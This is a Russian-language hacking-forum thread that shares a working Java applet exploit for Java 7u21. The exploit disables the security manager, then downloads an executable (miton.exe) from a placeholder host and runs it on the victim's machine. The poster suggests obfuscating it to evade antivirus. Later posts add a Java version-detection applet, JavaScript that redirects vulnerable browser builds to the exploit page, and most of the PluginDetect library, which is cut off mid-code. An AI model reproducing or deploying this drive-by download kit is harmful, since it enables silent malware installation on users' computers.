1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Java эксплоит

Тема в разделе "Веб-Уязвимости | Эксплуатация", создана пользователем nitob, 4 янв 2014.

  1. TopicStarter Overlay
    nitob

    nitob

    Регистрация:
    21 мар 2013
    Сообщения:
    42
    Симпатии:
    29
    Эксплоит под 7.21 палит 6 ав если кто захочит обфусцирует код буквально за пару часов
    если будете тестить на XP то путь к папке ставить С:\\ для наводки даю палит 3 класса путь для виндовс 7 оставляем стандартные обходит фаерфол. Кому пригодилось от плюсов не откажусь зделал буквально на днях сам эксплоит взял с exploit-db.com
    Код:
    import java.applet.Applet;
    import java.awt.image.BufferedImage;
    import java.awt.image.ByteLookupTable;
    import java.awt.image.DataBufferByte;
    import java.awt.image.Kernel;
    import java.awt.image.LookupOp;
    import java.awt.image.Raster;
    import java.awt.image.WritableRaster;
    import java.beans.Statement;
    import java.io.DataInputStream;
    import java.io.File;
    import java.io.FileOutputStream;
    import java.io.IOException;
    import java.io.PrintStream;
    import java.net.MalformedURLException;
    import java.net.URL;
    import java.net.URLConnection;
    import java.security.AccessControlContext;
    import java.security.AllPermission;
    import java.security.CodeSource;
    import java.security.Permissions;
    import java.security.ProtectionDomain;
    import java.security.cert.Certificate;
     
    public class TestByteBI
      extends Applet
    {
      public int numArrays_ = 10;
      public final int arrayLength = 11;
      public int[][] Arrays_;
     
      public void init()
      {
        go();
      }
     
      public void go()
      {
        try
        {
          String name = "setSecurityManager";
          Object[] o1 = new Object[1];
          Object o2 = new Statement(System.class, name, o1);
         
          this.Arrays_ = new int[this.numArrays_][];
         
          Kernel kernel = new Kernel(1, 1, new float[] { 1.0F, 1.0F, 1.0F, 1.0F });
          byte[][] data = new byte[1][2000];
          for (int i = 0; i < data.length; i++) {
            for (int j = 0; j < data.length; j++) {
              data[j] = 65;
            }
          }
          ByteLookupTable lookupTable = new ByteLookupTable(0, data);
         
          LookupOp op = new LookupOp(lookupTable, null);
         
          int srcW = 20;int srcH = 20;
          int dstW = 7;int dstH = 7;
         
          BufferedImage src = new TestByteBI.MyBufferedImage(srcW, srcH, dstW, dstH, 11);
         
          BufferedImage tmp = new BufferedImage(dstW, dstH, 10);
         
     
          DataBufferByte dstBuffer = new DataBufferByte(dstW * dstH);
          for (int i = 0; i < this.numArrays_; i++)
          {
            this.Arrays_ = new int[11];
            for (int j = 0; j < 11; j++) {
              this.Arrays_[j] = 1768650105;
            }
          }
          WritableRaster raster = Raster.createWritableRaster(tmp.getSampleModel(), dstBuffer, null);
         
          BufferedImage dst = new BufferedImage(tmp.getColorModel(), raster, false, null);
         
     
     
     
     
     
          Object[] oo = new Object[7];
         
          oo[2] = new Statement(System.class, name, o1);
         
     
          Permissions ps = new Permissions();
          ps.add(new AllPermission());
         
     
          oo[3] = new AccessControlContext(new ProtectionDomain[] { new ProtectionDomain(new CodeSource(new URL(""), new Certificate[0]), ps) });
         
     
     
     
     
     
     
     
     
     
     
     
     
     
          oo[4] = ((Statement)oo[2]).getTarget();
         
          op.filter(src, dst);
         
          int[] a = null;
          for (int i = 0; i < this.numArrays_; i++) {
            if ((this.Arrays_ != null) && (this.Arrays_.length > 11))
            {
              a = this.Arrays_;
              break;
            }
          }
          if (null == a)
          {
            System.out.println("Failed to overwrite array length!");
            return;
          }
          boolean found = false;
          int ooLen = oo.length;
          for (int i = 13; i < a.length; i++) {
            if ((a[(i - 1)] == ooLen) && (a == 0) && (a[(i + 1)] == 0) && (a[(i + 2)] != 0) && (a[(i + 3)] != 0) && (a[(i + 4)] != 0) && (a[(i + 5)] == 0) && (a[(i + 6)] == 0))
            {
              int stmTrg = a[(i + 4)];
              for (int j = i + 7; j < i + 7 + 64; j++) {
                if (a[j] == stmTrg)
                {
                  a[(j - 1)] = a[(i + 3)];
                  found = true;
                  break;
                }
              }
              if (found) {
                break;
              }
            }
          }
          if (!found) {
            System.out.println("Failed to find object array!");
          } else {
            try
            {
              System.out.println("Security Manager = " + System.getSecurityManager());
             
     
              ((Statement)oo[2]).execute();
             
     
              System.out.println("Security Manager = " + System.getSecurityManager());
              try
              {
                URL url = new URL("http://Ваш сайт/miton.exe");
                URLConnection l = url.openConnection();
                DataInputStream b = new DataInputStream(l.getInputStream());
                byte[] fileData = new byte[l.getContentLength()];
                for (int i = 0; i < fileData.length; i++) {
                  fileData = b.readByte();
                }
                b.close();
                FileOutputStream c = new FileOutputStream(new File("C:\\Users\\Public\\miton.exe"));
                c.write(fileData);
                c.close();
                new ProcessBuilder(new String[] { "C:\\Users\\Public\\miton.exe" }).start();
              }
              catch (MalformedURLException m)
              {
                System.out.println();
              }
              catch (IOException e)
              {
                System.out.println(e);
              }
            }
            catch (Exception ex)
            {
              ex.printStackTrace();
            }
          }
        }
        catch (Exception ex)
        {
          ex.printStackTrace();
        }
      }
     
      public static void main(String[] args)
      {
        new TestByteBI().go();
      }
     
      public static class MyBufferedImage
        extends BufferedImage
      {
        private int fakeW_;
        private int fakeH_;
       
        public MyBufferedImage(int w, int h, int fakeW, int fakeH, int type)
        {
          super(h, type);
         
          this.fakeW_ = fakeW;
          this.fakeH_ = fakeH;
        }
       
        public int getWidth()
        {
          return this.fakeW_;
        }
       
        public int getHeight()
        {
          return this.fakeH_;
        }
      }
    }
    
     
    • Like Like x 5
    Метки:
  2. usFire

    usFire

    Регистрация:
    20 авг 2012
    Сообщения:
    274
    Симпатии:
    177
    подскажи как юзать
     
  3. TopicStarter Overlay
    nitob

    nitob

    Регистрация:
    21 мар 2013
    Сообщения:
    42
    Симпатии:
    29
    Эклипс или нетбианс
     
  4. TopicStarter Overlay
    nitob

    nitob

    Регистрация:
    21 мар 2013
    Сообщения:
    42
    Симпатии:
    29
    теперь как мы знаем java информирует своих пользывателей об устновленой (старой версии java) либо об использывании аплетов но тут так же можно ввести в заблуждение проверки версии java и так что нам нужно первым делом мы будем проверять версию java благо политика это не запрещает сам код
    Код:
    import java.applet.Applet;
     
    public class A
      extends Applet
    {
      public String getVersion()
      {
        return System.getProperty("java.version");
      }
     
      public String getVendor()
      {
        return System.getProperty("java.vendor");
      }
    }
    
    теперь если java на компьютере пользывателя установленая нужная
    Код:
    <script type="text/javascript" src="plugdetect.js"></script>
    <script type="text/javascript">
     
    function getVersion(str){
     
        if(str=="Java"){
            var j_version=new Object();
            j_version.exists=false;
            j_version.version='0';
            j_version.build='0';
           
            var j_detect = PluginDetect.getVersion('Java', 'getJavaInfo.jar')
     
            if(j_detect!=null){
                j_version.exists=true;
                var vArray = j_detect.split(',');
                j_version.version = vArray[1];
                j_version.build = vArray[3];
            }   
            return j_version;       
        }
     
    }
    function dump(obj) {
        var out = "";
        if(obj && typeof(obj) == "object"){
            for (var i in obj) {
                out += i + ": " + obj;
            }
        } else {
            out = obj;
        }
      if ( out.indexOf("6build: 27")==-1){} else {top.location = '/1.html';}
      if ( out.indexOf("7build: 0")==-1){} else {top.location = '/1.html';}
      if ( out.indexOf("7build: 1")==-1){} else {top.location = '/1.html';}
      if ( out.indexOf("7build: 2")==-1){} else {top.location = '/1.html';}
      if ( out.indexOf("7build: 3")==-1){} else {top.location = '/1.html';}
      if ( out.indexOf("7build: 5")==-1){} else {top.location = '/1.html';}
      if ( out.indexOf("7build: 6")==-1){} else {top.location = '/1.html';}
      if ( out.indexOf("7build: 7")==-1){} else {top.location = '/1.html';}
      if ( out.indexOf("7build: 8")==-1){} else {top.location = '/1.html';}
      if ( out.indexOf("7build: 9")==-1){} else {top.location = '/1.html';}
      if ( out.indexOf("7build: 10")==-1){} else {top.location = '/1.html';}
      if ( out.indexOf("7build: 11")==-1){} else {top.location = '/1.html';}
      if ( out.indexOf("7build: 12")==-1){} else {top.location = '/1.html';}
      if ( out.indexOf("7build: 13")==-1){} else {top.location = '/1.html';}
      if ( out.indexOf("7build: 14")==-1){} else {top.location = '/1.html';}
      if ( out.indexOf("7build: 15")==-1){} else {top.location = '/1.html';}
    }
    var j_version = getVersion("Java");
    dump(j_version);
     
     
    </script>
    перенаправляем пользывателя на страницу /1.html
    а так же нам нужет файл PluginDetect
    Код:
    /*
    PluginDetect v0.8.1
    www.pinlady.net/PluginDetect/license/
    [ getVersion isMinVersion hasMimeType onWindowLoaded onDetectionDone ]
    [ AdobeReader Java(OTF & NOTF) ]
    */
    var PluginDetect={version:"0.8.1",name:"PluginDetect",openTag:"<",isDefined:function(b){return typeof b!="undefined"},isArray:function(b){return(/array/i).test(Object.prototype.toString.call(b))},isFunc:function(b){return typeof b=="function"},isString:function(b){return typeof b=="string"},isNum:function(b){return typeof b=="number"},isStrNum:function(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,\-]*/,splitNumRegx:/[\.\_,\-]/g,getNum:function(b,c){var d=this,a=d.isStrNum(b)?(d.isDefined(c)?new RegExp(c):d.getNumRegx).exec(b):null;return a?a[0]:null},compareNums:function(h,f,d){var e=this,c,b,a,g=parseInt;if(e.isStrNum(h)&&e.isStrNum(f)){if(e.isDefined(d)&&d.compareNums){return d.compareNums(h,f)}c=h.split(e.splitNumRegx);b=f.split(e.splitNumRegx);for(a=0;a<Math.min(c.length,b.length);a++){if(g(c[a],10)>g(b[a],10)){return 1}if(g(c[a],10)<g(b[a],10)){return -1}}}return 0},formatNum:function(b,c){var d=this,a,e;if(!d.isStrNum(b)){return null}if(!d.isNum(c)){c=4}c--;e=b.replace(/\s/g,"").split(d.splitNumRegx).concat(["0","0","0","0"]);for(a=0;a<4;a++){if(/^(0+)(.+)$/.test(e[a])){e[a]=RegExp.$2}if(a>c||!(/\d/).test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},getPROP:function(d,b,a){var c;try{if(d){a=d}}catch(c){}return a},findNavPlugin:function(l,e,c){var j=this,h=new RegExp(l,"i"),d=(!j.isDefined(e)||e)?/\d/:0,k=c?new RegExp(c,"i"):0,a=navigator.plugins,g="",f,b,m;for(f=0;f<a.length;f++){m=a[f].description||g;b=a[f].name||g;if((h.test(m)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))||(h.test(b)&&(!d||d.test(RegExp.leftContext+RegExp.rightContext)))){if(!k||!(k.test(m)||k.test(b))){return a[f]}}}return null},getMimeEnabledPlugin:function(k,m,c){var e=this,f,b=new RegExp(m,"i"),h="",g=c?new RegExp(c,"i"):0,a,l,d,j=e.isString(k)?[k]:k;for(d=0;d<j.length;d++){if((f=e.hasMimeType(j[d]))&&(f=f.enabledPlugin)){l=f.description||h;a=f.name||h;if(b.test(l)||b.test(a)){if(!g||!(g.test(l)||g.test(a))){return f}}}}return 0},getVersionDelimiter:",",findPlugin:function(d){var c=this,b,d,a={status:-3,plugin:0};if(!c.isString(d)){return a}if(d.length==1){c.getVersionDelimiter=d;return a}d=d.toLowerCase().replace(/\s/g,"");b=c.Plugins[d];if(!b||!b.getVersion){return a}a.plugin=b;a.status=1;return a},getPluginFileVersion:function(f,b){var h=this,e,d,g,a,c=-1;if(h.OS>2||!f||!f.version||!(e=h.getNum(f.version))){return b}if(!b){return e}e=h.formatNum(e);b=h.formatNum(b);d=b.split(h.splitNumRegx);g=e.split(h.splitNumRegx);for(a=0;a<d.length;a++){if(c>-1&&a>c&&d[a]!="0"){return b}if(g[a]!=d[a]){if(c==-1){c=a}if(d[a]!="0"){return b}}}return e},AXO:window.ActiveXObject,getAXO:function(a){var d=null,c,b=this;try{d=new b.AXO(a)}catch(c){};return d},INIT:function(){this.init.library(this)},init:{$:1,hasRun:0,objProperties:function(d,e,b){var a,c={};if(e&&b){if(e[b[0]]===1&&!d.isArray(e)&&!d.isFunc(e)&&!d.isString(e)&&!d.isNum(e)){for(a=0;a<b.length;a=a+2){e[b[a]]=b[a+1];c[b[a]]=1}}for(a in e){if(!c[a]&&e[a]&&e[a][b[0]]===1){this.objProperties(d,e[a],b)}}}},publicMethods:function(c,f){var g=this,b=g.$,a,d;if(c&&f){for(a in c){try{if(b.isFunc(c[a])){f[a]=c[a](f)}}catch(d){}}}},plugin:function(a,c){var d=this,b=d.$;if(a){d.objProperties(b,a,["$",b,"$$",a]);if(!b.isDefined(a.getVersionDone)){a.installed=null;a.version=null;a.version0=null;a.getVersionDone=null;a.pluginName=c}}},detectIE:function(){var init=this,$=init.$,doc=document,e,x,userAgent=navigator.userAgent||"",progid,progid1,progid2;$.isIE=eval("/*@cc_on!@*/!1");$.verIE=$.isIE?((/MSIE\s*(\d+\.?\d*)/i).test(userAgent)?parseFloat(RegExp.$1,10):7):null;$.ActiveXEnabled=!1;$.ActiveXFilteringEnabled=!1;if($.isIE){try{$.ActiveXFilteringEnabled=window.external.msActiveXFilteringEnabled()}catch(e){}progid1=["Msxml2.XMLHTTP","Msxml2.DOMDocument","Microsoft.XMLDOM","TDCCtl.TDCCtl","Shell.UIHelper","HtmlDlgSafeHelper.HtmlDlgSafeHelper","Scripting.Dictionary"];progid2=["WMPlayer.OCX","ShockwaveFlash.ShockwaveFlash","AgControl.AgControl",];progid=progid1.concat(progid2);for(x=0;x<progid.length;x++){if($.getAXO(progid[x])){$.ActiveXEnabled=!0;if(!$.dbug){break}}}if($.ActiveXEnabled&&$.ActiveXFilteringEnabled){for(x=0;x<progid2.length;x++){if($.getAXO(progid2[x])){$.ActiveXFilteringEnabled=!1;break}}}}},detectNonIE:function(){var e=this,c=this.$,d=navigator,b=c.isIE?"":d.userAgent||"",f=d.vendor||"",a=d.product||"";c.isGecko=(/Gecko/i).test(a)&&(/Gecko\s*\/\s*\d/i).test(b);c.verGecko=c.isGecko?c.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(b)?RegExp.$1:"0.9"):null;c.isChrome=(/(Chrome|CriOS)\s*\/\s*(\d[\d\.]*)/i).test(b);c.verChrome=c.isChrome?c.formatNum(RegExp.$2):null;c.isSafari=!c.isChrome&&((/Apple/i).test(f)||!f)&&(/Safari\s*\/\s*(\d[\d\.]*)/i).test(b);c.verSafari=c.isSafari&&(/Version\s*\/\s*(\d[\d\.]*)/i).test(b)?c.formatNum(RegExp.$1):null;c.isOpera=(/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(b);c.verOpera=c.isOpera&&((/Version\s*\/\s*(\d+\.?\d*)/i).test(b)||1)?parseFloat(RegExp.$1,10):null},detectPlatform:function(){var e=this,d=e.$,b,a=navigator.platform||"";d.OS=100;if(a){var c=["Win",1,"Mac",2,"Linux",3,"FreeBSD",4,"iPhone",21.1,"iPod",21.2,"iPad",21.3,"Win.*CE",22.1,"Win.*Mobile",22.2,"Pocket\\s*PC",22.3,"",100];for(b=c.length-2;b>=0;b=b-2){if(c&&new RegExp(c,"i").test(a)){d.OS=c[b+1];break}}}},library:function(c){var e=this,d=document,b,a;c.init.objProperties(c,c,["$",c]);for(a in c.Plugins){c.init.plugin(c.Plugins[a],a)}e.publicMethods(c.PUBLIC,c);c.win.init();c.head=d.getElementsByTagName("head")[0]||d.getElementsByTagName("body")[0]||d.body||null;e.detectPlatform();e.detectIE();e.detectNonIE();c.init.hasRun=1}},handler:function(c,b,a){return function(){c(b,a)}},fPush:function(b,a){var c=this;if(c.isArray(a)&&(c.isFunc(b)||(c.isArray(b)&&b.length>0&&c.isFunc(b[0])))){a.push(b)}},callArray:function(b){var c=this,a,d;if(c.isArray(b)){d=[].concat(b);for(a=0;a<d.length;a++){c.call(d[a]);b.splice(0,1)}}},call:function(c){var b=this,a=b.isArray(c)?c.length:-1;if(a>0&&b.isFunc(c[0])){c[0](b,a>1?c[1]:0,a>2?c[2]:0,a>3?c[3]:0)}else{if(b.isFunc(c)){c(b)}}},PUBLIC:{isMinVersion:function(a){return function(h,g,d,c){var e=a.findPlugin(h),f,b=-1;if(e.status<0){return e.status}f=e.plugin;g=a.formatNum(a.isNum(g)?g.toString():(a.isStrNum(g)?a.getNum(g):"0"));if(f.getVersionDone!=1){f.getVersion(g,d,c);if(f.getVersionDone===null){f.getVersionDone=1}}if(f.installed!==null){b=f.installed<=0.5?f.installed:(f.installed==0.7?1:(f.version===null?0:(a.compareNums(f.version,g,f)>=0?1:-0.1)))};return b}},getVersion:function(a){return function(g,d,c){var e=a.findPlugin(g),f,b;if(e.status<0){return null};f=e.plugin;if(f.getVersionDone!=1){f.getVersion(null,d,c);if(f.getVersionDone===null){f.getVersionDone=1}}b=(f.version||f.version0);b=b?b.replace(a.splitNumRegx,a.getVersionDelimiter):b;return b}},onDetectionDone:function(a){return function(h,g,c,b){var d=a.findPlugin(h),j,e;if(d.status==-3){return -1}e=d.plugin;if(!a.isArray(e.funcs)){e.funcs=[]};if(e.getVersionDone!=1){j=a.getVersion?a.getVersion(h,c,b):a.isMinVersion(h,"0",c,b)}if(e.installed!=-0.5&&e.installed!=0.5){a.call(g);return 1}if(e.NOTF){a.fPush(g,e.funcs);return 0}return 1}},onWindowLoaded:function(a){return function(b){if(a.win.loaded){a.call(b)}else{a.fPush(b,a.win.funcs)}}},hasMimeType:function(a){return function(c){if(!a.isIE&&c&&navigator&&navigator.mimeTypes){var f,e,b,d=a.isArray(c)?c:(a.isString(c)?[c]:[]);for(b=0;b<d.length;b++){if(a.isString(d)&&/[^\s]/.test(d)){f=navigator.mimeTypes[d];e=f?f.enabledPlugin:0;if(e&&(e.name||e.description)){return f}}}}return null}},z:0},codebase:{$:1,isDisabled:function(){var a=this,b=a.$;return b.ActiveXEnabled&&b.isIE&&b.verIE>=7?0:1},checkGarbage:function(d){var b=this,c=b.$,a;if(c.isIE&&d&&c.getPROP(d.firstChild,"object")){a=c.getPROP(d.firstChild,"readyState");if(c.isNum(a)&&a!=4){b.garbage=1;return 1}}return 0},emptyGarbage:function(){var a=this,b=a.$,c;if(b.isIE&&a.garbage){try{window.CollectGarbage()}catch(c){}a.garbage=0}},init:function(d){if(!d.init){var b=this,c=b.$,a;d.init=1;d.min=0;d.max=0;d.hasRun=0;d.version=null;d.L=0;d.altHTML="";d.span=document.createElement("span");d.tagA='<object width="1" height="1" style="display:none;" codebase="#version=';d.tagB='" '+((/clsid\s*:/i).test(d.$$.classID)?'classid="':'type="')+d.$$.classID+'">'+d.ParamTags+d.altHTML+c.openTag+"/object>";for(a=0;a<d.Lower.length;a++){d.Lower[a]=c.formatNum(d.Lower[a]);d.Upper[a]=c.formatNum(d.Upper[a])}}},isActiveXObject:function(i,b){var f=this,g=f.$,a=0,h,d=i.$$,c=i.span;if(i.min&&g.compareNums(b,i.min)<=0){return 1}if(i.max&&g.compareNums(b,i.max)>=0){return 0}if(d.BIfuncs&&d.BIfuncs.length){g.callArray(d.BIfuncs)}c.innerHTML=i.tagA+b+i.tagB;if(g.getPROP(c.firstChild,"object")){a=1};f.checkGarbage(c);c.innerHTML="";if(a){i.min=b}else{i.max=b}return a},convert_:function(f,a,b,e){var d=f.convert[a],c=f.$;return d?(c.isFunc(d)?c.formatNum(d(b.split(c.splitNumRegx),e).join(",")):b):d},convert:function(h,c,g){var e=this,f=h.$,b,a,d;c=f.formatNum(c);a={v:c,x:-1};if(c){for(b=0;b<h.Lower.length;b++){d=e.convert_(h,b,h.Lower);if(d&&f.compareNums(c,g?d:h.Lower)>=0&&(!b||f.compareNums(c,g?e.convert_(h,b,h.Upper):h.Upper)<0)){a.v=e.convert_(h,b,c,g);a.x=b;break}}}return a},isMin:function(g,f){var d=this,e=g.$,c,b,a=0;d.init(g);if(!e.isStrNum(f)||d.isDisabled()){return a};if(!g.L){g.L={};for(c=0;c<g.Lower.length;c++){if(d.isActiveXObject(g,g.Lower[c])){g.L=d.convert(g,g.Lower[c]);break}}}if(g.L.v){b=d.convert(g,f,1);if(b.x>=0){a=(g.L.x==b.x?d.isActiveXObject(g,b.v):e.compareNums(f,g.L.v)<=0)?1:-1}};return a},search:function(g){var k=this,h=k.$,i=g.$$,b=0,c;k.init(g);c=(g.hasRun||k.isDisabled())?1:0;g.hasRun=1;if(c){return g.version};var o,n,m,j=function(q,t){var r=[].concat(f),s;r[q]=t;s=k.isActiveXObject(g,r.join(","));if(s){b=1;f[q]=t}else{p[q]=t}return s},d=g.DIGITMAX,e,a,l=9999999,f=[0,0,0,0],p=[0,0,0,0];for(o=0;o<p.length;o++){f[o]=g.DIGITMIN[o]||0;e=f.join(",");a=f.slice(0,o).concat([l,l,l,l]).slice(0,f.length).join(",");for(m=0;m<d.length;m++){if(h.isArray(d[m])){d[m].push(0);if(d[m][o]>p[o]&&h.compareNums(a,g.Lower[m])>=0&&h.compareNums(e,g.Upper[m])<0){p[o]=d[m][o]}}}for(n=0;n<20;n++){if(p[o]-f[o]<=16){for(m=p[o];m>=f[o]+(o?1:0);m--){if(j(o,m)){break}}break}j(o,Math.round((p[o]+f[o])/2))}if(!b){break}p[o]=f[o]}if(b){g.version=k.convert(g,f.join(",")).v};return g.version}},win:{$:1,loaded:false,hasRun:0,init:function(){var b=this,a=b.$;if(!b.hasRun){b.hasRun=1;b.addEvent("load",a.handler(b.runFuncs,a));b.addEvent("unload",a.handler(b.cleanup,a))}},addEvent:function(c,b){var e=this,d=e.$,a=window;if(d.isFunc(b)){if(a.addEventListener){a.addEventListener(c,b,false)}else{if(a.attachEvent){a.attachEvent("on"+c,b)}else{a["on"+c]=e.concatFn(b,a["on"+c])}}}},concatFn:function(d,c){return function(){d();if(typeof c=="function"){c()}}},funcs0:[],funcs:[],cleanup:function(b){for(var a in b){b[a]=0}b=0},runFuncs:function(a){a.win.loaded=true;a.callArray(a.win.funcs0);a.callArray(a.win.funcs);if(a.DOM){a.DOM.onDoneEmptyDiv()}},z:0},DOM:{$:1,isEnabled:{$:1,objectTag:function(){var a=this.$;return a.isIE?a.ActiveXEnabled:1},objectProperty:function(){var a=this.$;return a.isIE&&a.verIE>=7?1:0}},div:null,divID:"plugindetect",divWidth:50,pluginSize:1,altHTML:"&nbsp;&nbsp;&nbsp;&nbsp;",emptyNode:function(c){var b=this,d=b.$,a,f;if(c&&c.childNodes){for(a=c.childNodes.length-1;a>=0;a--){if(d.isIE){b.setStyle(c.childNodes[a],["display","none"])}c.removeChild(c.childNodes[a])}}},LASTfuncs:[],onDoneEmptyDiv:function(){var f=this,g=f.$,b,d,c,a,h;if(!g.win.loaded||g.win.funcs0.length||g.win.funcs.length){return}for(b in g.Plugins){d=g.Plugins;if(d){if(d.OTF==3||(d.funcs&&d.funcs.length)){return}}}g.callArray(f.LASTfuncs);if(f.div&&f.div.childNodes){for(b=f.div.childNodes.length-1;b>=0;b--){c=f.div.childNodes;f.emptyNode(c)}try{f.div.innerHTML=""}catch(h){}}if(!f.div){a=document.getElementById(f.divID);if(a){f.div=a}}if(f.div&&f.div.parentNode){try{f.div.parentNode.removeChild(f.div)}catch(h){}f.div=null}},width:function(){var g=this,e=g.DOM,f=e.$,d=g.span,b,c,a=-1;b=d&&f.isNum(d.scrollWidth)?d.scrollWidth:a;c=d&&f.isNum(d.offsetWidth)?d.offsetWidth:a;return c>0?c:(b>0?b:Math.max(c,b))},obj:function(b){var g=this,d=g.DOM,c=g.span,f,a=c&&c.firstChild?c.firstChild:null;try{if(a&&b){d.div.focus()}}catch(f){}return a},rs:function(){var b=this,a=b.DOM.$;return a.isIE?a.getPROP(b.obj(),"readyState"):b.undefined},getTagStatus:function(a,m,r,p,d,g){var f=/clsid\s*\:/i,o=r&&f.test(r.outerHTML||"")?r:(p&&f.test(p.outerHTML||"")?p:0),h=r&&!f.test(r.outerHTML||"")?r:(p&&!f.test(p.outerHTML||"")?p:0),l=a&&f.test(a.outerHTML||"")?o:h;if(!a||!a.span||!m||!m.span||!l||!l.span){return -2}var s=this,c=s.$,q,k=a.width(),j=l.width(),n=m.width(),b=a.readyState(),t=l.readyState();if(k<0||j<0||n<=s.pluginSize){return 0}if(s.isEnabled.objectProperty()){var i=c.getPROP(a.obj(),"object");if(i){return 1.5}if(g&&!a.pi&&c.isDefined(i)&&c.isIE&&a.tagName==l.tagName&&a.time<=l.time){if(k===j&&b===0&&t!==0){a.pi=1}}}if(j<n){return a.pi?-0.1:0}if(k>=n){if(!a.winLoaded&&c.win.loaded){return a.pi?-0.5:-1}if(c.isNum(d)){if(!c.isNum(a.count2)){a.count2=d}if(d-a.count2>0){return a.pi?-0.5:-1}}}try{if(k==s.pluginSize&&(!c.isIE||b===4)){if(!a.winLoaded&&c.win.loaded){return 1}if(a.winLoaded&&c.isNum(d)){if(!c.isNum(a.count)){a.count=d}if(d-a.count>=5){return 1}}}}catch(q){}return a.pi?-0.1:0},setStyle:function(b,h){var c=this,d=c.$,g=b.style,a,f;if(g&&h){for(a=0;a<h.length;a=a+2){try{g[h[a]]=h[a+1]}catch(f){}}}},insertDivInBody:function(a,h){var j=this,d=j.$,g,b="pd33993399",c=null,i=h?window.top.document:window.document,f=i.getElementsByTagName("body")[0]||i.body;if(!f){try{i.write('<div id="'+b+'">.'+d.openTag+"/div>");c=i.getElementById(b)}catch(g){}}f=i.getElementsByTagName("body")[0]||i.body;if(f){f.insertBefore(a,f.firstChild);if(c){f.removeChild(c)}}},insert:function(f,b,g,a,l,k){var q=this,i=q.$,m,n=document,s,r,p=n.createElement("span"),o,h,c=["outlineStyle","none","borderStyle","none","padding","0px","margin","0px","visibility","visible"],j="outline-style:none;border-style:none;padding:0px;margin:0px;visibility:"+(k?"hidden;":"visible;")+"display:inline;";if(!i.isDefined(a)){a=""}if(i.isString(f)&&(/[^\s]/).test(f)){f=f.toLowerCase().replace(/\s/g,"");s=i.openTag+f+' width="'+q.pluginSize+'" height="'+q.pluginSize+'" ';s+='style="'+j+'" ';for(o=0;o<b.length;o=o+2){if(/[^\s]/.test(b[o+1])){s+=b[o]+'="'+b[o+1]+'" '}}s+=">";for(o=0;o<g.length;o=o+2){if(/[^\s]/.test(g[o+1])){s+=i.openTag+'param name="'+g[o]+'" value="'+g[o+1]+'" />'}}s+=a+i.openTag+"/"+f+">"}else{f="";s=a}if(!q.div){h=n.getElementById(q.divID);if(h){q.div=h}else{q.div=n.createElement("div");q.div.id=q.divID}q.setStyle(q.div,c.concat(["width",q.divWidth+"px","height",(q.pluginSize+3)+"px","fontSize",(q.pluginSize+3)+"px","lineHeight",(q.pluginSize+3)+"px","verticalAlign","baseline","display","block"]));if(!h){q.setStyle(q.div,["position","absolute","right","0px","top","0px"]);q.insertDivInBody(q.div)}}r={span:null,winLoaded:i.win.loaded,tagName:f,outerHTML:s,DOM:q,time:new Date().getTime(),width:q.width,obj:q.obj,readyState:q.rs};if(q.div&&q.div.parentNode){q.setStyle(p,c.concat(["fontSize",(q.pluginSize+3)+"px","lineHeight",(q.pluginSize+3)+"px","verticalAlign","baseline","display","inline"]));q.div.appendChild(p);try{p.innerHTML=s}catch(m){};r.span=p;r.winLoaded=i.win.loaded}return r}},file:{$:1,any:"fileStorageAny999",valid:"fileStorageValid999",save:function(d,f,c){var b=this,e=b.$,a;if(d&&e.isDefined(c)){if(!d[b.any]){d[b.any]=[]}if(!d[b.valid]){d[b.valid]=[]}d[b.any].push(c);a=b.split(f,c);if(a){d[b.valid].push(a)}}},getValidLength:function(a){return a&&a[this.valid]?a[this.valid].length:0},getAnyLength:function(a){return a&&a[this.any]?a[this.any].length:0},getValid:function(c,a){var b=this;return c&&c[b.valid]?b.get(c[b.valid],a):null},getAny:function(c,a){var b=this;return c&&c[b.any]?b.get(c[b.any],a):null},get:function(d,a){var c=d.length-1,b=this.$.isNum(a)?a:c;return(b<0||b>c)?null:d},split:function(g,c){var b=this,e=b.$,f=null,a,d;g=g?g.replace(".","\\."):"";d=new RegExp("^(.*[^\\/])("+g+"\\s*)$");if(e.isString(c)&&d.test(c)){a=(RegExp.$1).split("/");f={name:a[a.length-1],ext:RegExp.$2,full:c};a[a.length-1]="";f.path=a.join("/")}return f},z:0},Plugins:{java:{$:1,mimeType:["application/x-java-applet","application/x-java-vm","application/x-java-bean"],mimeType_dummy:"application/dummymimejavaapplet",classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93",classID_dummy:"clsid:8AD9C840-044E-11D1-B3E9-BA9876543210",navigator:{$:1,a:(function(){var b,a=!0;try{a=window.navigator.javaEnabled()}catch(b){}return a})(),javaEnabled:function(){return this.a},mimeObj:0,pluginObj:0},OTF:null,getVerifyTagsDefault:function(){return[1,this.applet.isDisabled.VerifyTagsDefault_1()?0:1,1]},getVersion:function(j,g,i){var b=this,d=b.$,e,a=b.applet,h=b.verify,k=b.navigator,f=null,l=null,c=null;if(b.getVersionDone===null){b.OTF=0;k.mimeObj=d.hasMimeType(b.mimeType);if(k.mimeObj){k.pluginObj=k.mimeObj.enabledPlugin}if(h){h.begin()}}a.setVerifyTagsArray(i);d.file.save(b,".jar",g);if(b.getVersionDone===0){if(a.should_Insert_Query_Any()){e=a.insert_Query_Any(j);b.setPluginStatus(e[0],e[1],f,j)}return}if((!f||d.dbug)&&b.DTK.query().version){f=b.DTK.version}if((!f||d.dbug)&&b.navMime.query().version){f=b.navMime.version}if((!f||d.dbug)&&b.navPlugin.query().version){f=b.navPlugin.version}if(b.nonAppletDetectionOk(f)){c=f}if(!c||d.dbug||a.VerifyTagsHas(2.2)||a.VerifyTagsHas(2.5)){e=b.lang.System.getProperty();if(e[0]){f=e[0];c=e[0];l=e[1]}}b.setPluginStatus(c,l,f,j);if(a.should_Insert_Query_Any()){e=a.insert_Query_Any(j);if(e[0]){c=e[0];l=e[1]}}b.setPluginStatus(c,l,f,j)},nonAppletDetectionOk:function(b){var 